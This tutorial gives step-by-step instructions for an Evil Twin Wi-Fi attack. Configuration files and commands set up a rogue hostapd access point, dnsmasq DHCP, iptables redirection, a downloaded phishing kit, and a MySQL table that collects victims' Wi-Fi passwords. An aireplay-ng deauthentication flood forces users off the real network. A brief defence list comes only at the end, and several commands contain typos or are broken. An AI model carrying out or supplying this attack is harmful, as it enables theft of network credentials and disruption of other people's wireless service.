Wireless protocols have drastically evolved since 2003 after the invention of WPA in terms of secured Wi-Fi access. These days wireless network ha become a part of daily life. Almost every home, business, corporate sectors, stores, industries, institutions have their personal Wireless AP (Access Point). Moreover to make internet free to every individual some organizations have established public open Wi-Fi APs in almost every public place like airports, railway stations, libraries, bus terminals, etc. But when the question comes about security, even after implementing the best security practices available, wireless network will always be less secure than wired network, just like David Bernstein once said, “FOR EVERY LOCK, THERE IS SOMEONE OUT THERE TRYING TO PICK IT OR BREAK IT”.
An Evil Twin is like a rogue Wi-Fi AP (Access Point), where attacker creates a fake AP to lure the users into thinking it is a trusted wireless network. The attacker amplifies the signal in a way that the victim automatically connects to the rogue AP because of its faster beaconing and strong range.
Practical Scenario: The logic behind an Evil Twin attack is simple, you just have to create a fake access point with the same name of the targeted Wi-Fi. Then you need to create a webpage to show the victim that he needs to enter the password to access the internet and store it in a database.
Prerequisites: Below is a list of hardware and software used in this article. You can use any hardware as long as it is compatible with the software you be using.
Hardware Used: – A Laptop (4gb RAM, Intel i5 processor) – USB Wireless TP-LINK Adapter – 150MBPS (TP-Link WN722N) – Wi-Fi dongle for internet connection/Ethernet with internet connectivity
Software Used: – VMWare workstation 14 – Kali Linux 2019.2 OS – Airmon-ng, Airodump-ng, Airplay-ng – Dnsmasq – Iptables – Apache2 – Mysql – Hostapd
Note:Hostapd: It is used to create a fake targeted access point, be it WEP, WPA, WPA2 personal or enterprise secured. It should work.Dnsmasq: It is used to resolve requests from/to a host. It can also act as a DHCP server.Apache: It acts as a web-server to the victim. It will basically host the phishing webpage in the attacker system.Mysql: It is used to store the credentials in the database, entered from the website.Iptables: It is a firewall, used for the Linux based systems.
Step 1: Setup Environment Update the operating system and install required packages. – sudo apt-get install update – sudo apt-get install dnsmasq hostapd apache2Step 2: Configuration of NetworkManager Before starting monitor mode make sure your NetworkManager and airmon-ng don’t conflict with each other.
Open the configuration file of the NetworkManager and put the MAC address of the device that you want your NetworkManager to stop managing. – gedit /etc/NetworkManager/NetworkManager.conf
Now add the lines mentioned below at the end of the file: – [keyfile]
Note:Please change AA:BB:CC:DD:EE:FF(eth0) and A2:B2:C2:D2:E2:F2(wlan0) with your respective MAC Addresses.
Step3: Setup Wireless Interface Find the wireless interface using iwconfig command. In my case it is wlan0: – iwconfig
Put the wireless interface in monitor mode using ‘airmon-ng’. A new interface will be created in this case it is wlan0mon. – airmon-ng start wlan0
Now it’s time to start monitoring all the AIR packets using ‘airodump-ng’. – airodump-ng wlan0mon
In this case I will target CH 9. Please note the target details.
– BSSID: It is used to describe sections of a wireless local area network or WLAN. It recognizes the access point or router because it has a unique address creates the wireless network. – CH (Channel number): It is the medium through which our wireless networks can send and receive data. – ESSID: It is an electronic marker or identifier that serves as an identification and address for your computer, or network device to connect to a wireless router or access point and then access the internet.
(Optional Step): Set tx-power of WiFi card to max: 1000mW to set the best range – ifconfig wlan0mon down # Bring down the interface – iw reg set US # Set region to be US – ifconfig wlan0mon up # Bring the interface up – iwconfig wlan0mon # Check tx-power, should be 30dBm
● tx-power stands for transmission power. By default it is set to 20dBm(Decibel metre) or 100mW. ● tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table. If your country is set to US(United State) installation
.your card should operate on 30 dBm(1000 mW)
Step 4: SetupFake Access point
First of all create a directory called “fakeap” under /root/fakeap.
– mkdir /root/fakeap – cd /root/fakeap Now create a new hostapd configuration file here and paste the below code inside it. – gedit hostapd.conf Code: interface=wlan0mon driver=nl80211 ssid=[Fake AP Name] //Take it from the airodump-ng result hw_mode=g channel=[Fake AP Channel] //Take it from the airodump-ng result macaddr_acl=0 ignore_broadcast_ssid=0
Note:interface: Monitor mode Wireless Interface to use.ssid: Fake Access Point ESSID (name).channel: Fake AP Channel to operate on.
Next we just have to execute the .conf file using the below command and our rogue access point will be up and running. – hostapd hostapd.conf
Step 5: Set up DHCP We will use dnsmasq to set up DHCP in the attacker machine. Dnsmasq with the support of forwarder is certainly fast and easy to modify and execute. Open the terminal and create a configuration file for dnsmasq and paste the below code in it. – Gedit dnsmasq.conf Code interface=wlan0mon dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h dhcp-option=3,192.168.1.1 dhcp-option=6,192.168.1.1 server=220.127.116.11 log-queries log-dhcp listen-address=127.0.0.1 Note:dhcp-range: IP Range for network clients. 12h is the lease time.dhcp-option=3: Gateway IP for the networks.dhcp-option=6: DNS Server.listen-address: Bind DHCP to local IP.
Next you have to create the network gateway and assign netmask to the interface and add it in the routing table. – ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0 – route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 Now, let’s start the dnsmasq server.
Step6: Enable NAT by setting Firewall rules in iptables and set port forwarding Enter the following commands to set-up NAT – iptables –flush – iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
– iptables –append FORWARD –in-interface wlan0mon -j ACCEPT – iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.1:80 – iptables -t nat -A POSTROUTING -j MASQUERADE
Now we will setup the port forwarding. – echo 1 > /proc/sys/net/ipv4/ip_forward
Step 7: Setup Phishing Site
We need a phishing site like forged document or falsified page, where the user will be lured to enter the passphrase which will be stored in the attacker database.
You can create your own web application but let’s just download from the below link for now. https://drive.google.com/file/d/1xChAUOHPiWiejbEKYmdyW–9aj7COzUR/view Extract the .zip file in /root/fakeap/rogueap. – unzip rogueap.zip Next move the content of rogueap/ to /var/www/html directory. Before that don’t forget to clean the content of /var/www/html. – rm -rf /var/www/html/* – mv root/fakeap/rogueap/* /var/www/html/ Step 8: Setup pache server and Mysql database We need a webserver to host the phishing website in the attacker’s machine. Please execute the below command to start the apache2 server. – service apache2 start So we have our phishing web application ready. Now we require a database to store the passwords the victim will type and submit. Open Mysql and execute the below commands. – service mysql start – mysql – mysql> create database rogueap; – mysql> create user rogueuser; – mysql> grant all on rogueap.* to ‘rogueuser’@’localhost’ identified by ‘roguepassword‘; – mysql> use rogueap; – mysql> create table wpa_keys(password1 varchar(30), password2 varchar(30)); – mysql> ALTER DATABASE rogueap CHARACTER SET ‘utf8’; Note: Don’t change any values in the above mentioned queries and inside /var/www/html/dbconnect.php, because this is where the credentials are defined. If you change any value of the database configuration you have to modify everywhere.
Step 9: DNS spoof and De-authentication Now, just redirect the traffic to the Gateway IP of our forged network using dnsspoof. – dnsspoof -i wlan0mon Finally, to make the targeted WiFi down we will use airplay-nghich will deauthenticate every user from the targeted WiFi and make it unavailable by sending high number of requests from our machine. That will force the victim to connect to our rogue access point. Please execute the below command in the terminal window to de
–authenticate the target. – aireplay-ng -00 -a AA:BB:CC:DD:EE:FF wlan0mon – Note: AA:BB:CC:DD:EE:FF, is the targeted WiFi’s BSSID, you can get it from the result of airodump-ng. Now, you just have to wait for the victim to connect with the ii and visit any website, it will redirect to the phishing website.
The moment the victim enter the password it will be stored in our mysql database. To check the password please execute the below query in mysql. – mysql> select * from wpa_keys;
The password is: p@ssword123 So that’s it. That is how you can create an Evil Twin and steal the password from the targeted Wi-Fi. Defending Against an Evil Twin Attack – The best way to defend against the Evil Twin attack is to know about the tactic so that you c understand in which situation it should be taken as suspicious.
– The moment you feel you abruptly disconnected from you trusted network and suddenly see an open wireless network with same name of your trusted APou should take it as abnormal incident.
– It is recommended to never connect to an open Wi-Fi network, especially those who do not have encrypted communication.
– If you see the router is updating, you can turn your Wi-Fi off and connect it via LAN to know what is going on.
– For validation purpose you can connect with the open network from a restricted environment (sandbox) and check if it is asking for any credentials, put in any random credentials and see the response.